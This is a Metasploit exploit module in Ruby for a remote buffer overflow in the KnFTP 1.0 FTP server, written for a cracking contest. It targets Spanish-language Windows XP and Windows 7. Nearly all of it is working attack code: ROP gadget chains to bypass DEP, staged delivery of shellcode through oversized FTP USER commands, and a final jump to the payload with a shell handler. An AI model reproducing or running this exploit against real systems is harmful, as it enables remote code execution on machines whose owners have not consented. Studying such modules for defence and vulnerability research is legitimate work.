KnFTP 1.0 Buffer Overflow

`#module for metasploit framework, for more information  
#see the Description.  
#Copyright (C) October 04th 2011  
#Author: Javier Aguinaga (pasta) el.tio.pastafrola[at]gmail.com  
#  
#This program is free software: you can redistribute it and/or modify  
#it under the terms of the GNU General Public License as published by  
#the Free Software Foundation, either version 3 of the License, or  
#(at your option) any later version.  
#  
#This program is distributed in the hope that it will be useful,  
#but WITHOUT ANY WARRANTY; without even the implied warranty of  
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  
#GNU General Public License for more details.  
#  
#You should have received a copy of the GNU General Public License  
#along with this program. If not, see <http://www.gnu.org/licenses/>.  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::Remote::Ftp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'KnFTP FTP Server Multiple Commands Remote Buffer Overflow Vulnerabilities',  
'Description' => %q{  
This module exploits a vulnerability in the KnFTP  
application. The same by-pass DEP with AlwaysOn.  
  
Built for the 10th contest of [C]racks[L]atino[S].  
},  
'Author' => [ 'pasta' ],  
'License' => GPL_LICENSE,  
'Version' => '$Revision: 0 $',  
'References' =>  
[  
[ 'URL', 'http://www.securityfocus.com/bid/49427'],  
],  
'Privileged' => false,  
'Payload' =>  
{  
'Space' => 0x300,  
'BadChars' => "\x00",  
'DisableNops' => 'True'  
},  
'Platform' => [ 'win' ],  
'Targets' =>  
[  
[  
'Windows XP SP2/SP3 Spanish (NX)',  
{  
'rop_movs' => [  
0x77bf1d16, # POP EAX  
0x41414141, # PADDING  
0x77c07451, # LEA EAX,[EBP-10]  
0x77bf2751, # EBP = ESP+C && JMP EAX <--  
  
# se ejecuta la carga de EBP  
# y despues carga en EAX el valor  
# EBP-10, esto es x el JMP EAX  
  
0x77bef2c1, # ADD EAX,8  
0x77bef2c1, # ADD EAX,8  
0x77bef2c1, # ADD EAX,8  
0x77bef2c1, # ADD EAX,8  
0x77be95ab, # XCHG EAX,ESI # CMPS <-- ROBA  
0x77c0620b, # MUEVE 6 DWORDS DE ESI A EDI  
0x41414141, # JUNK  
0x41414141, # JUNK  
0x77bf22b6 # JMP $  
],  
  
'rop_popeax_null' => [  
0x77bef519, # POP ECX  
0x41414141, # PADDING  
0x42424242, # JUNK  
0x77bf1d16, # POP EAX  
0x42424242, # JUNK  
0x77c0f284 # LEA EAX,[EAX+ECX*8]  
],  
  
'rop_popeax' => [  
0x77bf1d16, # POP EAX  
0x41414141, # PADDING  
0x42424242 # JUNK  
],  
  
'rop_writemem' => [  
0x77bef519, # POP ECX  
0x42424242, # JUNK  
0x77c12f02, # MOV [ECX],EAX  
0x42424242, # JUNK  
0x77bf22b6 # JMP $  
],  
  
'rop_jmpeax' => [  
0x77be68cd, # JMP EAX  
],  
  
'rop_changeeip' => [  
0x77bf1d16, # POP EAX  
0x41414141, # PADDING  
0x41414141, # JUNK  
0x77be68cd # JMP EAX  
],  
  
'place4payload' => 0x77e1ac81, # .data msvcrt   
'place4argumen' => 0x77e1ab40, # .data msvcrt  
  
'loop' => 0x77bf22b6, # JMP $  
}  
],  
  
[  
'Windows 7 Professional SP1 Spanish (NX)',  
{  
'rop_movs' => [  
0x770c181f,  
0x41414141,  
0x77099871,  
0x770abffd,  
0x7709a5c5,  
0x7709a5c5,  
0x7709a5c5,  
0x7709a5c5,  
0x770ce0ab,  
0x770c07d2,  
0x41414141,  
0x41414141,  
0x770aac5b  
],  
  
'rop_popeax_null' => [  
0x7709a984,  
0x41414141,  
0x42424242,  
0x770c181f,  
0x42424242,  
0x770c040f  
],  
  
'rop_popeax' => [  
0x770c181f,  
0x41414141,  
0x42424242  
],  
  
'rop_writemem' => [  
0x7709a984,  
0x42424242,  
0x770a3bdb,  
0x42424242,  
0x770aac5b  
],  
  
'rop_jmpeax' => [  
0x7709c441,  
],  
  
'rop_changeeip' => [  
0x770c181f,  
0x41414141,  
0x41414141,  
0x7709c441  
],  
  
'place4payload' => 0x77136C01,  
'place4argumen' => 0x77136a80,  
  
'loop' => 0x77bf22b6,  
}  
],  
],  
'DisclosureDate' => 'Sept 19 2011',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptInt.new('TIME', [ true, 'Delay between packets. (seconds)', 5 ]),  
], self.class)  
end  
  
def exploit  
connect  
print_status("Sending eggs")  
  
address = target['place4payload'] + 0x300  
payload.encoded << 'A'*(16 - payload.encoded.length % 16)  
  
(payload.encoded.length/16).times {|i|  
i += 1  
  
buf = 'A'*276  
buf << [address - 16 * i].pack('<L')  
buf << 'A'*4  
  
buf << target['rop_movs'].pack('V*') + '1' # <-- byte corrido por CMPS  
  
buf << payload.encoded[payload.encoded.length - 16 * i, 16]  
sleep(datastore['TIME'])  
print "="*i + " "*((payload.encoded.length/16)-i) + "> #{i}/#{payload.encoded.length/16} egg[s]\r"  
send_user(buf)  
disconnect  
  
connect  
}  
  
memory = target['place4argumen']  
keys = {  
memory+0x04 => target['loop'],  
memory-0x38 => target['place4payload'],  
memory-0x2c => 0x300,  
memory-0x1c => 0x40  
}  
  
print_status("Disabling [D]ata [E]xecution [P]revention")  
  
j = 1  
keys.each {|direction, dword|  
  
buf = 'A'*284  
  
if [dword].pack('<L').index(0.chr)  
ecx = 0x01111111  
eax = 2**32 + dword - ecx*8  
  
target['rop_popeax_null'][2] = ecx  
target['rop_popeax_null'][4] = eax  
buf << target['rop_popeax_null'].pack('V*')  
else  
target['rop_popeax'][2] = dword  
buf << target['rop_popeax'].pack('V*')  
end  
  
target['rop_writemem'][1] = direction  
buf << target['rop_writemem'].pack('V*')  
  
sleep(datastore['TIME'])  
  
print "="*j + " "*(5-j) + "> #{j}/5 egg[s]\r"  
j += 1  
  
send_user(buf)  
disconnect  
  
#connect again  
connect  
}  
  
buf = 'A'*280  
buf << [memory].pack('<L')  
  
load_arguments = 0x00403822  
ecx = 0x01111111  
eax = 2**32 + load_arguments - ecx * 8  
  
target['rop_popeax_null'][2] = ecx  
target['rop_popeax_null'][4] = eax  
  
buf << (target['rop_popeax_null'] + target['rop_jmpeax'] + [0x41414141]).pack('V*')  
  
sleep(datastore['TIME'])  
print "=====> 5/5\r"  
send_user(buf)  
  
print_good("PAYLOAD INJECT SUCCESSFULL")  
disconnect  
  
connect  
  
buf = 'A'*284  
target['rop_changeeip'][2] = target['place4payload'] + 0x300 - payload.encoded.length + 7  
  
buf << target['rop_changeeip'].pack('V*')  
  
print_status("Executing shellcode...")  
send_user(buf)  
sleep(datastore['TIME']*4)  
  
handler  
disconnect  
end  
  
end  
  
`